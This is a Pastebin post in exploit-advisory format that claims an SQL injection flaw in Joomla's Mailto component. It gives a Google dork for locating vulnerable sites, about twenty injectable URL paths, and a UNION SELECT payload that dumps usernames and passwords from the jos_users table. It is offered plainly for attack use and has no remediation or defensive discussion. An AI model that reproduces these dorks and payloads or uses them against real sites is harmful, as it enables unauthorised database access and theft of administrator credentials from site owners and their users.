Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #H4M4573R
- ####################################################################
- # Exploit Title : Joomla Mailto Components 1.2.2.2 SQL Injection
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_mailto''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_mailto&tmpl=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&type=raw&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=mailto&article=[SQL Injection]&Itemid=1
- /index.php?option=com_mailto&tmpl=mailto&article=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=gantry&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=skyextend-fjt&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=kallyas&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=ca_cloudbase2_j25&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=jf_texturia&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=jsn_boot_pro&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=jm-business-marketing&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=findario1.7&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=beez_20&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=allrounder-j1.6&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=siteground-j16-41&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=nagariknews&link=[SQL Injection]
- /index.php?option=com_mailto&tmpl=component&template=sarmuni&link=[SQL Injection]
- # Example SQL Injection Exploit Payload :
- *************************************
- +and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--
- +and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--&Itemid=1
- ####################################################################
Add Comment
Please, Sign In to add comment